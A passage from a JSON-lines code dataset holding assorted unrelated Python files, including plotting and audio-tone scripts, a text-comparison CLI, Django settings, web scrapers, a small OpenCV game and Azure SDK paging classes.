axs5]\n means = [\"mu\", \"mu\", \"mean\", \"mean\"]\n stds = [\"std_nein\", \"std_szpan\"] * 2\n stds_pprint = [\"std_{Nein}\", \"std_{Szpan}\"] * 2\n\n for k in [0, 1, 2, 3]:\n\n ax = axes[k]\n mean = means[k]\n std = stds[k]\n std_pprint = stds_pprint[k]\n\n # three subplots\n for (i, exp) in enumerate(exps):\n norm_distrib = (exp[\"data\"] - exp[mean]) / exp[std]\n # statistic, pvalue = normaltest(norm_distrib)\n sns.distplot(norm_distrib, ax=ax[i], rug=True)\n # ax[i].text(-4, 0.3, r'$test=%1.3f$' % statistic)\n # ax[i].text(-4, 0.28, r'$pvalue=%1.3f$' % pvalue)\n\n ax[i].set_title(\n r\"$n_{word} =\"\n + latex_float(exp[\"n_word\"])\n + \"\\quad n_{exp} = \"\n + latex_float(exp[\"n_exp\"])\n + \"$\"\n )\n ax[i].set_xlabel(\n \"$(M_n-\"\n + (\"\\mu\" if mean == \"mu\" else \"E_{theor}\")\n + \") / \"\n + std_pprint\n + \"$\"\n )\n ax[i].set_ylabel(\"Frequency\")\n\n s = 0\n if k >= 2:\n s = 1\n ax[i].plot(\n exp[\"x\" + str(k + 1 + s)],\n exp[\"p\" + str(k + 1 + s)],\n color=\"red\",\n label=\"$\\mathcal{N}(0,1)$\",\n )\n\n # figs_raw.suptitle(\n # \"Histogram_chains of the values of $M_n$ for different word lengths\"\n # )\n # figs_mean_std.suptitle(\n # \"$M_n$ distribution, normalized with theoretical mean\"\n # + \"($E_{th}$) and empirical variance ($\\sigma^2$)\"\n # )\n # figs_normalized.suptitle(\n # \"$M_n$ distribution, normalized using empirical mean ($\\mu$) and variance ($\\sigma^2$)\"\n # )\n\n i = 0\n for n1 in [\"empirical\", \"theoretical\"]:\n for n2 in [\"Neininger\", \"Szpankowski\"]:\n figs[i].suptitle(\n \"$M_n$ distribution, normalized with {} mean and {} variance.\".format(\n n1, n2\n )\n )\n i += 1\n\n top = 0.91\n bottom = 0.06\n left = 0.04\n right = 0.99\n hspace = 0.32\n wspace = 0.13\n\n # for ax in axs_normalized:\n # ax.legend()\n\n # for ax in axs_mean_std:\n # ax.legend()\n\n for ax in axes:\n for a in ax:\n a.legend()\n\n for f in figs:\n f.subplots_adjust(\n top=top, bottom=bottom, left=left, right=right, hspace=hspace, wspace=wspace\n )\n\n # figs_normalized.subplots_adjust(\n # top=top, bottom=bottom, left=left, right=right, hspace=hspace, wspace=wspace\n # )\n # figs_mean_std.subplots_adjust(\n # top=top, bottom=bottom, left=left, right=right, hspace=hspace, wspace=wspace\n # )\n # figs_raw.subplots_adjust(\n # top=top, bottom=bottom, left=left, right=right, hspace=hspace, wspace=wspace\n # )\n\n print(\"Done\")\n plt.show()\n\n\ndef files_choice(arg, name):\n \"\"\"Return None, None if arguments weren't provided at program launch\"\"\"\n try:\n if arg == \"--file\":\n return name, None\n elif arg == \"--save\":\n return None, name\n else:\n return None, None\n except:\n return None, None\n\n\nif __name__ == \"__main__\":\n try:\n df, fs = files_choice(sys.argv[2], sys.argv[3])\n except:\n df, fs = None, None\n\n if len(sys.argv) > 1:\n # x = input(\"Do you want to save the generated figures ? y/N \")\n x = False # temporary\n # save = False if (x.lower() == 'n') else bool(x)\n save = False\n\n if sys.argv[1] == \"-s\":\n\n simulation(random_markov=True, filesave=sys.argv[2])\n\n elif sys.argv[1] == \"-m\":\n\n save_name = None\n\n if save:\n save_name = input(\"What prefix for mean analysis figures ?\")\n\n analysing_theoretical_mean(\n datafile=df, filesave=fs, save=save, save_name=save_name\n )\n\n elif sys.argv[1] == \"-v\":\n\n save_name = None\n\n if save:\n\n save_name = input(\"What prefix for std analysis figures ?\")\n\n analysing_theoretical_std(\n datafile=df, filesave=fs, save=save, save_name=save_name\n )\n\n elif sys.argv[1] == \"-cdf\":\n\n experiments, ns = data_loading(datafile=df)\n figs, axs = plt.subplots(1, len(exps))\n\n for (exp_index, one_exp) in enumerate(experiments):\n print_cdf(one_exp, axs[exp_ind], \"mu\", \"std\")\n\n figs.suptitle(\"Cumulative distribution function plots for normalized $M_n$\")\n\n elif sys.argv[1] == \"-range\":\n\n print(\"Prompting for range of simulation `range(a, b, s)`\")\n a = int(input(\"a = \"))\n b = int(input(\"b = \"))\n s = int(input(\"s = \"))\n ns = list(range(a, b, s))\n n_exp = int(input(\"\\nHow many experiments ? \"))\n\n simulation(\n random_markov=True, filesave=sys.argv[2], length_values=ns, n_exp=n_exp\n )\n\n else:\n print_histogram_chains(random_markov=True, datafile=sys.argv[1])\n\n plt.show()\n\n else:\n print_histogram_chains(random_markov=True)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":25137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"23940499","text":"from selenium.webdriver.common.by import By\nfrom page import Page\n\n\nclass Base(Page):\n\n @property\n def footer(self):\n return self.Footer(self.testsetup)\n\n class Footer(Page):\n\n footer_links_list = [\n {\n 'locator': (By.CSS_SELECTOR, '#fsl > a:nth-child(1)'),\n 'url_suffix': '//www.google.com/intl/en/ads/?fg=1',\n },\n ]\n\n\n\n","sub_path":"pages/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"613423814","text":"\"\"\"\ndphon\n \nUsage:\n dphon [--n=] [--output=] [--variants-only]\n dphon -h | --help\n dphon --version\n \nOptions:\n -h --help Show this screen.\n --version Show program version.\n --variants-only Limit to matches with graphic variation.\n --n= Limit to matches with length >= n [default: 3].\n \nExamples:\n dphon 老子丙.txt 老子乙.txt --output=matches.txt\n dphon 周南.txt 鹿鳴之什.txt --variants-only\n \nHelp:\n For more information on using this tool, please visit the Github repository:\n https://github.com/direct-phonology/direct\n\"\"\"\n\nfrom sys import stderr, stdin, stdout\nfrom docopt import docopt\n\nfrom . import __version__\nfrom .lib import Comparator\n\n\ndef run():\n \"\"\"CLI entrypoint.\"\"\"\n arguments = docopt(__doc__, version=__version__)\n # read in the two files\n with open(arguments[''], encoding='utf-8') as file:\n text1 = file.read()\n with open(arguments[''], encoding='utf-8') as file:\n text2 = file.read()\n # store their texts and filenames\n c = Comparator(a=text1,\n b=text2,\n a_name=arguments[''],\n b_name=arguments[''])\n # get and reduce initial matches\n matches = c.get_matches(min_length=int(arguments['--n']))\n # if requested, remove matches without graphic variation\n if arguments['--variants-only']:\n matches = c.matches_with_graphic_variation(matches)\n # group matches and format for output\n groups = Comparator.group_matches(matches)\n output = c.resolve_groups(groups)\n # write to a file if requested\n if arguments['--output']:\n with open(arguments['--output'], mode='w', encoding='utf8') as file:\n file.write(output)\n # otherwise write to stdout\n else:\n stdout.buffer.write(output.encode('utf-8'))\n","sub_path":"dphon/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"518788043","text":"import sys\nimport wos_parser\nimport wos_graph\nimport wos_clasterization\n\nif __name__ == \"__main__\":\n if \"help\" in sys.argv:\n print(\"Parameters:\")\n print(\"showmds - show multidimensional scaling\")\n print(\"nodownload - don't download new article, use old\")\n print(\"showts - show titles for every claster\")\n print(\"showhdc - show hierarchical document clustering\")\n print(\"showlda - show latent Dirichlet allocation\")\n sys.exit()\n print(\"Add 'help' for showing parameters\")\n print(\"Input search string\")\n topic_name = input()\n\n if \"nodownload\" in sys.argv:\n print(\"Input count of articles\")\n cnt_articles = int(input())\n else:\n cnt_articles = wos_parser.site_parser(topic_name)\n articles = []\n for i in range(1, cnt_articles+1):\n wos_parser.article_parser(topic_name + str(i), articles)\n articles = wos_parser.correct_articles(articles)\n\n articles = wos_graph.build_graph(articles, topic_name)\n\n showmds = 0\n showts = 0\n showhdc = 0\n showlda = 0\n if \"showmds\" in sys.argv:\n showmds = 1\n if \"showts\" in sys.argv:\n showts = 1\n if \"showhdc\" in sys.argv:\n showhdc = 1\n if \"showlda\" in sys.argv:\n showlda = 1\n\n wos_clasterization.build_csv(articles, topic_name)\n wos_clasterization.article_clasterization(topic_name, showmds, showts,\n showhdc, showlda)\n","sub_path":"article/art_main.py","file_name":"art_main.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"323267603","text":"# -*- coding: utf-8 -*-\n\n################################################\n################# Imports ######################\n################################################\n\nimport wave\nimport numpy as np\nimport pygame\nfrom scipy import signal\nimport matplotlib.pylab as plt\nfrom matplotlib import pyplot\nimport customFunctions as fun\n\n\n################################################=\n################# Parameters ###################\n################################################\n\nBASE_AMP = 10000 # amplitude of nonaccented tone... −32,768 to +32,767 range for 16bit\nACCENT_AMP = 20000 # amplitude of accented tone... −32,768 to +32,767 range for 16bit\nSAMPLERATE = 48000 # Hz\nNCHANNELS = 1 # mono: sound played identically in both channels\nSOUNDLEN = .4 #\nSOUNDFREQ = 333 # Hz... 333 is about Ab in pitch\n\nfinalDuration = SOUNDLEN * 10 #seconds\nnTones = int(finalDuration/SOUNDLEN) # how many sounds per the total duration\n\n################################################\n########### Constructing Pure Tone #############\n################################################\n\n# calculate the total amount of cycles in the SOUNDLEN\nncycles = SOUNDLEN * SOUNDFREQ\n\n# calculate the total amount of samples per SOUNDLEN\nnsamples = SOUNDLEN * SAMPLERATE\n\n# calculate samples per cycle\nspc = nsamples / ncycles\n\n# stepsize: distance between samples within a cycle\nstepsize = (2*np.pi) / spc\n\n# create a range of numbers between 0 and 2*pi\nx = np.arange(0, 2*np.pi, stepsize)\n\n# make a sine wave out of the range\nsine = np.sin(x)\n\n# increase the amplitude\nsine_nonaccent = sine * BASE_AMP\nsine_accent = sine * ACCENT_AMP\n\n# repeat the sine wave for the length of the tone\ntone_nonaccent = np.tile(sine_nonaccent, int(ncycles))\ntone_accent = np.tile(sine_accent, int(ncycles))\n\nprint(len(tone_accent))\nprint(nsamples)\n\n\n################################################\n############ Modulating Sine Tone ##############\n################################################\n\n# Modulation variables\nrise_fall_ratio = 19 #(1/842)*16095 # rise_fall_ratio:1 ratio of rise and fall ramps\nwindow_floor = 0.2 # creating window between .2 and 1\n\n# calculate asymmetric Hanning vector (22ms rise and 394 fall)\nriseLen = len(tone_accent) / rise_fall_ratio \nfallLen = len(tone_accent) - riseLen \n\n# create Hann vector for rise len * 2\nriseVec = fun.customHanning((riseLen * 2), window_floor)\n# delete second half of vector (after 1.0)... i.e. only want upramp\nriseVec = riseVec[0:int(riseLen)]\n\n# create Hann vector for fall len * 2\nfallVec = fun.customHanning((fallLen * 2), window_floor)\n# delete first half of vector\nfallVec = fallVec[int(fallLen):]\n\n# combine vectors\nhannVec = np.concatenate((riseVec, fallVec),)\n\nif len(hannVec) > len(tone_nonaccent): # check for rounding problems with hannVec length\n hannVec = hannVec[0:len(tone_nonaccent)]\n\n# apply Hanning amplitude modulation\ntone_nonaccent = tone_nonaccent * hannVec\ntone_accent = tone_accent * hannVec\n\n################################################\n############## Final mixing etc ################\n################################################\n\n# tile tones to the desired length\nmeter = np.concatenate((tone_accent, tone_accent),)\n\nfinal_output = np.tile(meter, int(nTones/2))\n\n# initialise mixer module (it requires the sampling rate and num of channels)\npygame.mixer.init(frequency=SAMPLERATE, channels=NCHANNELS)\n\n# create sound out of the allsines vector\ntone = pygame.mixer.Sound(final_output.astype('int16'))\n\n# open new wave file objects\ntonefile = wave.open('beat_noaccent.wav', 'w')\n\n# set parameters for pure tone\ntonefile.setframerate(SAMPLERATE)\ntonefile.setnchannels(NCHANNELS)\ntonefile.setsampwidth(2) # in units of bytes and 8 bits per byte = 16bit\n\n# get buffers\ntonebuffer = tone.get_raw()\n\n# write raw buffer to the wave file\ntonefile.writeframesraw(tonebuffer)\n\n# close the wave file \ntonefile.close()\n\n# Done!\n","sub_path":"tone.py","file_name":"tone.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"154168665","text":"\n#!/usr/bin/python\n# coding:utf-8\n# Copyright (C) 2005-2016 All rights reserved.\n# FILENAME: \t taobao_test.py\n# VERSION: \t 1.0\n# CREATED: \t 2016-05-30 10:14\n# AUTHOR: \t xuexiang\n# DESCRIPTION:\n#\n# HISTORY:\n#*************************************************************\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\nimport comm\nimport re\nimport comm.PLog\nimport comm.requests_pkg\nimport comm.stone_funs\nimport json\n\n#ip = \"36.188.19.157\"\nip = \"223.104.255.231\"\nip = \"223.104.171.69\"\nip = \"113.210.187.106\"\nip = \"121.8.124.2\"\nurl = 'http://ip.taobao.com/service/getIpInfo.php?ip=' + ip\n(http_ok, resp) = comm.requests_pkg.get(url)\n\nreturn_info = \"\"\n\nif http_ok:\n #resp_content = comm.stone_funs.ToUtf8(resp.content)\n\n #resp_content = resp.content.encode('utf-8', 'ignore')\n json_data = json.loads(resp.content)\n \n #country\n contry_name = json_data[u'data'][u'country'].encode('utf-8')\n comm.PLog.Log(contry_name)\n\n #area\n area_name = json_data[u'data'][u'area'].encode('utf-8')\n comm.PLog.Log(area_name)\n\n #city\n city_name = json_data[u'data'][u'city'].encode('utf-8')\n comm.PLog.Log(city_name)\n\n #region\n region_name = json_data[u'data'][u'region'].encode('utf-8')\n comm.PLog.Log(region_name)\n\n #county\n county_name = json_data[u'data'][u'county'].encode('utf-8')\n comm.PLog.Log(county_name)\n\n result = []\n result.append(json_data[u'data'][u'ip'].encode('utf-8')) \n result.append(json_data[u'data'][u'country'].encode('utf-8'))\n result.append(json_data[u'data'][u'country_id'].encode('utf-8'))\n result.append(json_data[u'data'][u'area'].encode('utf-8'))\n result.append(json_data[u'data'][u'area_id'].encode('utf-8'))\n result.append(json_data[u'data'][u'region'].encode('utf-8'))\n result.append(json_data[u'data'][u'region_id'].encode('utf-8'))\n result.append(json_data[u'data'][u'city'].encode('utf-8'))\n result.append(json_data[u'data'][u'city_id'].encode('utf-8'))\n result.append(json_data[u'data'][u'county'].encode('utf-8'))\n result.append(json_data[u'data'][u'county_id'].encode('utf-8'))\n result.append(json_data[u'data'][u'isp'].encode('utf-8'))\n result.append(json_data[u'data'][u'isp_id'].encode('utf-8')) \n tt= \" \".join(result)\n comm.PLog.Log(tt)\n\n\n #resp_content = resp.content.decode('utf-8');\n #resp_content = resp_content.strip()\n #comm.PLog.Log(\"resp_content: \" + resp_content)\n\n #addr_list = re.split(r'\\s+', resp_content)\n #comm.PLog.Log(resp_content)\n\n","sub_path":"mo_collect_clean/taobao_test.py","file_name":"taobao_test.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"444506699","text":"import sys\nimport ASAPPpy.feature_extraction as fe\n\nfrom importlib import reload\n\nword2vec_model = None\nfasttext_model = None\nptlkb64_model = None\nglove300_model = None\nnumberbatch_model = None\n\nif __name__ == \"__main__\":\n models_loaded = 0\n while True:\n if models_loaded == 0:\n word2vec_model, fasttext_model, ptlkb64_model, glove300_model, numberbatch_model = fe.load_embeddings_models()\n models_loaded = 1\n fe.run_feature_extraction(word2vec_model=word2vec_model, fasttext_model=fasttext_model, ptlkb64_model=ptlkb64_model, glove300_model=glove300_model, numberbatch_model=numberbatch_model)\n print(\"Press enter to re-run the script, CTRL-C to exit\")\n sys.stdin.readline()\n reload(fe)\n ","sub_path":"ASAPPpy/tests/wrapper_feature_extraction.py","file_name":"wrapper_feature_extraction.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"615441555","text":"import dj_database_url\nfrom decouple import config\n\nfrom settings.base import *\nfrom settings.constants import HOURS\n\nSECRET_KEY = config('SECRET_KEY')\n\nALLOWED_HOSTS = config('ALLOWED_HOSTS').split(',')\n\nDEBUG = False\n\nSTATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, 'static'),\n)\n\nMIDDLEWARE += [\n 'whitenoise.middleware.WhiteNoiseMiddleware'\n]\n\n\nDATABASES = {\n 'default': dj_database_url.config(\n default=config('DATABASE_URL')\n )\n}\n","sub_path":"source/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"147683935","text":"# 1.6 string compression\ns1 = \"gkdkkssjjffddggg\"\nans = \"\"\ncount = 1\nfor i in range(len(s1)):\n if i == len(s1) - 1 or s1[i] != s1[i+1]:\n ans += s1[i] + str(count)\n count = 0\n count = count + 1\nprint(ans if len(ans) >= len(s1) else s1)\n","sub_path":"stringcompression.py","file_name":"stringcompression.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"154569362","text":"import sys\nimport json\n\nquery_entities = {}\n\nwith open('../queries-v2.txt') as qf:\n for line in qf:\n qid, _ = line.rstrip().split('\\t')\n query_entities[qid] = []\n\nwith open(sys.argv[1]) as cmns_file:\n for line in cmns_file:\n line = line.rstrip()\n qid, score, uri = line.split('\\t')\n score = float(score)\n query_entities[qid].append((uri, score))\n\noutput_json = {}\nfor qid, entities in query_entities.items():\n output_entities = []\n for entity, score in entities:\n entity = entity[1:-1]\n entity = entity.replace(\"dbpedia:\", \"http://dbpedia.org/resource/\")\n output_entities.append((entity, score))\n output_json[qid] = {'entities': output_entities}\n\nwith open(sys.argv[2], 'w') as qef:\n json.dump(output_json, qef, sort_keys=True,\n indent=4, separators=(',', ': '))\n","sub_path":"entity-extraction/nordlys/convert-nordlys-output.py","file_name":"convert-nordlys-output.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"30007089","text":"# coding=utf8\nimport os\nimport configparser\n\nclass readConfig:\n def __init__(self):\n #当前路径\n self.proDir = os.path.split(os.path.realpath(__file__))[0]\n\n #读取环境配置文件\n def readSetting(self):\n sConf = configparser.ConfigParser()\n #读取文件的路径\n sPath = os.path.join(self.proDir, 'setting.ini')\n sConf.read(sPath, encoding='utf8')\n setting = sConf.get('select', 'setting')\n return setting\n\n #读取其他配置文件\n def readOther(self, projectName, interfaceName):\n oConf = configparser.ConfigParser()\n #读取文件的路径\n oPath = os.path.join(self.proDir, '%s.ini'%projectName)\n oConf.read(oPath, encoding='utf8')\n return oConf.get(readConfig().readSetting(),interfaceName)","sub_path":"InterfaceTest/Config/readConfig.py","file_name":"readConfig.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"194148261","text":"import cv2\nimport random\nimport numpy as np\n\nscore=0\ntime=0\n\ndef WhacAMole(event,x,y,flags,param):\n global score,x1,x2\n if event==cv2.EVENT_LBUTTONDOWN and 50*x1<=x<=50*(x1+1) and 50*y1<=y<=50*(y1+1):\n score=score+1\n print(\"your score is :\"+str(score))\n\nprint(\"hello\")\nimg=cv2.imread(\"20.png\")\n\nimgold=img.copy()\nwhile True:\n img=imgold.copy()\n head=img[220:270,235:285].copy()\n x1=random.randint(0,2)\n y1=random.randint(0,2)\n img[50*x1:50*(x1+1),50*y1:50*(y1+1)]=img[220:270,235:285]\n \n for x2 in range(3):\n for y2 in range(3):\n cv2.rectangle(img,(0+50*x2,0+50*y2),(50+50*x2,50+50*y2),(0,255,0),3)\n \n cv2.imshow(\"image\",img)\n cv2.setMouseCallback('image',WhacAMole)\n cv2.waitKey(500)\n time=time+1\n if time>30:\n break;\nprint(\"Game over. Your final score is \"+str(score))\n","sub_path":"dml/Whoc-A-Mole.py","file_name":"Whoc-A-Mole.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"147190888","text":"import json, codecs\n\ndef getSetting(type=\"ALL\"):\n try:\n with codecs.open(\"settings.json\",\"r\",encoding=\"UTF-8\") as f:\n jsonString = f.read()\n setting = json.loads(jsonString)\n if type != \"ALL\":\n if type in setting['logs'].keys():\n return setting['logs'][type]\n else:\n return \"Key Not Found\"\n else:\n return setting['logs']\n except:\n return \"File I/O Err\"","sub_path":"Server NetworkLogger/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"612146698","text":"from django.http import HttpResponse, Http404\nimport urllib2\nfrom bs4 import BeautifulSoup as BS\nimport json\nfrom StringIO import StringIO\nimport gzip\n\ndef profile(request, name, region):\n\tLK = 'http://www.lolking.net/search'\n\tprofile = {}\n\n\tif not name or not region:\n\t\traise Http404\n\n\trequest = urllib2.Request(''.join([LK, '?name={0}®ion={1}'.format(name.encode('utf-8'), region)]))\n\trequest.add_header('Accept-encoding', 'gzip')\n\tresponse = urllib2.urlopen(request)\n\n\tsoup = None\n\tif response.info().get('Content-Encoding') == 'gzip':\n\t\tbuf = StringIO(response.read())\n\t\tf = gzip.GzipFile(fileobj=buf)\n\t\tsoup = BS(f.read())\n\telse:\n\t\tsoup = BS(response.read())\n\n\tif 'Search Results' in soup.title.text:\n\t\traise Http404\n\n\tnick_d = soup.find('div', id='summoner-titlebar-summoner-name')\n\tnick = nick_d.text\n\tprofile[nick] = {}\n\n\telo_d = soup.find_all('div', class_='personal_ratings_rating')[1]\n\telo = elo_d.text.strip()\n\tprofile[nick]['elo'] = elo\n\n\tlp_d = elo_d.findNext('div')\n\t#just 'X' from 'X League Points'\n\tlp = lp_d.text.split(' ')[0]\n\tprofile[nick]['lp'] = lp\n\n\tlks_d = lp_d.findNext('div')\n\tlks = lks_d.text.strip()\n\tprofile[nick]['lks'] = lks\n\n\twins_d = lks_d.findNext('span')\n\twins = wins_d.text\n\tprofile[nick]['wins'] = wins\n\n\tlosses_d = wins_d.findNext('span')\n\tlosses = losses_d.text\n\tprofile[nick]['losses'] = losses\n\n\treturn HttpResponse(json.dumps(profile, indent=4), content_type='application/json')\n","sub_path":"lk/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"141076177","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.paging import Paged\n\n\nclass ApplicationGatewayPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ApplicationGateway ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ApplicationGateway]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ApplicationGatewayPaged, self).__init__(*args, **kwargs)\nclass ApplicationGatewaySslPredefinedPolicyPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ApplicationGatewaySslPredefinedPolicy ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ApplicationGatewaySslPredefinedPolicy]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ApplicationGatewaySslPredefinedPolicyPaged, self).__init__(*args, **kwargs)\nclass ApplicationSecurityGroupPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ApplicationSecurityGroup ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ApplicationSecurityGroup]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ApplicationSecurityGroupPaged, self).__init__(*args, **kwargs)\nclass AvailableDelegationPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`AvailableDelegation ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[AvailableDelegation]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(AvailableDelegationPaged, self).__init__(*args, **kwargs)\nclass AvailableServiceAliasPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`AvailableServiceAlias ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[AvailableServiceAlias]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(AvailableServiceAliasPaged, self).__init__(*args, **kwargs)\nclass AzureFirewallPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`AzureFirewall ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[AzureFirewall]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(AzureFirewallPaged, self).__init__(*args, **kwargs)\nclass AzureFirewallFqdnTagPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`AzureFirewallFqdnTag ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[AzureFirewallFqdnTag]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(AzureFirewallFqdnTagPaged, self).__init__(*args, **kwargs)\nclass BastionHostPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`BastionHost ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[BastionHost]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(BastionHostPaged, self).__init__(*args, **kwargs)\nclass DdosProtectionPlanPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`DdosProtectionPlan ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[DdosProtectionPlan]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(DdosProtectionPlanPaged, self).__init__(*args, **kwargs)\nclass EndpointServiceResultPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`EndpointServiceResult ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[EndpointServiceResult]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(EndpointServiceResultPaged, self).__init__(*args, **kwargs)\nclass ExpressRouteCircuitAuthorizationPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ExpressRouteCircuitAuthorization ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ExpressRouteCircuitAuthorization]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ExpressRouteCircuitAuthorizationPaged, self).__init__(*args, **kwargs)\nclass ExpressRouteCircuitPeeringPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ExpressRouteCircuitPeering ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ExpressRouteCircuitPeering]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ExpressRouteCircuitPeeringPaged, self).__init__(*args, **kwargs)\nclass ExpressRouteCircuitConnectionPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ExpressRouteCircuitConnection ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ExpressRouteCircuitConnection]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ExpressRouteCircuitConnectionPaged, self).__init__(*args, **kwargs)\nclass PeerExpressRouteCircuitConnectionPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`PeerExpressRouteCircuitConnection ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[PeerExpressRouteCircuitConnection]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(PeerExpressRouteCircuitConnectionPaged, self).__init__(*args, **kwargs)\nclass ExpressRouteCircuitPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ExpressRouteCircuit ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ExpressRouteCircuit]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ExpressRouteCircuitPaged, self).__init__(*args, **kwargs)\nclass ExpressRouteServiceProviderPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ExpressRouteServiceProvider ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ExpressRouteServiceProvider]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ExpressRouteServiceProviderPaged, self).__init__(*args, **kwargs)\nclass ExpressRouteCrossConnectionPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ExpressRouteCrossConnection ` object\n \"\"\"\n\n _attribute_map = 